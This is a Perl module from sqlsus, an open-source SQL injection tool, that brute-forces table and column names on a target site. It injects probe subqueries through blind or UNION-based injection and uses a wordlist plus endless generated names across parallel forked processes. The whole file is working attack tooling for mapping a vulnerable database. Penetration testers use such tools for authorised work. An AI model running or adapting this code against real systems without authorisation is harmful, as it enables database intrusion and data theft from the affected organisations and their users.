package brute;

# This file is part of sqlsus
#
# Copyright (c) 2008,2009 sativouf
# http://sqlsus.sf.net/
#
# Licensed under the GPL version 2.0 license.
# See LICENSE file or
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.html

use strict;
use warnings;

use POSIX;

our $current_children = 0;

##################################
sub found_item {
	my $table = shift;
	my $column = shift;

	if ($column eq "1") {
		print STDERR "\r" . " " x 60 . "\rfound table \"$table\"\n";
		if (not &db::query("SELECT * FROM databases WHERE database_name = ? and table_name = ?", $main::database, $table)) {
			&db::query("INSERT INTO databases VALUES (?, ?, ?, ?)", $main::database, $table, '', '');
		}
	} else {
		print STDERR "\r" . " " x 60 . "\rfound column \"$column\"\n";
		if (not &db::query("SELECT * FROM databases WHERE database_name = ? and table_name = ? and column_name = ?", $main::database, $table, $column)) {
			&db::query("INSERT INTO databases VALUES (?, ?, ?, ?)", $main::database, $table, $column, '');
			&db::query("DELETE FROM databases WHERE database_name = ? and table_name = ? and column_name = ''", $main::database, $table);
		}
	}


}

##################################
sub try_item {
	my $table = shift;
	my $column = shift;

	my $query = "SELECT LENGTH(IFNULL($column,1))+1 FROM $main::database.$table LIMIT 1";
	my $res;

	if ($conf::blind) {
		do {
			return if $main::interrupt;
			$res = &select::inject("AND ($query)");
		} while (&functions::is_error_code($res->code));

		if (index($res->content, $conf::string_to_match) >= 0) {
			&found_item($table, $column);
			return 1;
		}
	} else {
		if ((&select::query($query, 1))[0]) {
			&found_item($table, $column);
			return 1;
		}
	}
	return 0;
}


##################################
sub round_item {
	my $prefix = shift;
	my $table  = shift;
	my $column = shift;
	my $counter = shift;

	while ($conf::processes == $current_children) {
		sleep .3;
		last if $main::interrupt;
	}
	$current_children++;

	return if fork();

	print STDERR "\r". " "x60 . "\rtrying \"" . ($column eq 1 ? $prefix . $table : $column) . "\" (# $counter)" unless $counter % 10;

	if ($conf::uc_first and $column eq "1") {
		exit if &try_item($prefix . ucfirst($table), $column);
	} 
	if ($conf::uc_all and $column eq "1") {
		exit if &try_item($prefix . uc($table), $column);
	}
	&try_item($prefix . $table, $column);
	exit;
}


##################################
sub guess {
	my $table = shift;

	my $add_string = $conf::brute_start_string;

	my $i = 0;

	# baby zombies killer
	$SIG{CHLD} = sub {
		while (my $child = waitpid(-1,WNOHANG)) {
			last if $child == -1;
			$current_children--;
		}
	};

	my $dict;
	if ($table) {
		$dict = $conf::brute_column_dict;
	} else {
		$dict = $conf::brute_table_dict;
	}

	if (-e "$dict") {
		print STDERR "\r" . " "x60 . "\r[+] Using dictionnary \"$dict\"\n";
		open DICT, "< $dict";
		while (<DICT>) {
			last if $main::interrupt;
			next if /^\s*$/;
			chomp;
			if ($table) {
				&round_item('', $table, $_, $i++);
			} else {
				&round_item($conf::table_prefix, $_, 1, $i++);
			}
		}
		close DICT;
	}


	while ($current_children) {
		sleep .3;
	}

	print STDERR "\n";
	if (&functions::question("Continue with bruteforce", qw(y n)) eq "n") {
		return;
	}


	print STDERR "\r" . " "x60 . "\r[+] Using bruteforce (lc";
	print STDERR " + uc" if $conf::uc_all;
	print STDERR " + uc_first" if $conf::uc_first;
	print STDERR ")\n";

	while (not $main::interrupt) {
		if ($table) {
			&round_item('', $table, $add_string++, $i++);
		} else {
			&round_item($conf::table_prefix, $add_string++, 1, $i++);
		}
	}

	waitpid(-1, 0);
}


##################################
sub command {
	my $args = shift;

	if (not $conf::blind and not @conf::columns) {
		print STDERR "Error : columns for UNION not set, set them in the configuration file or use \"start\" first\n";
		return 0;
	}

	if (not $main::database) {
		print STDERR "Error : target database not set, use \"start\" first\n";
		return 0;
	}


	if ($args =~ /^(?:tables|columns\s+(.*))$/i) {
		&guess($1);
	} else {
		print STDERR "usage: brute tables | brute columns table_name";
	}
	print STDERR "\n";
}


1
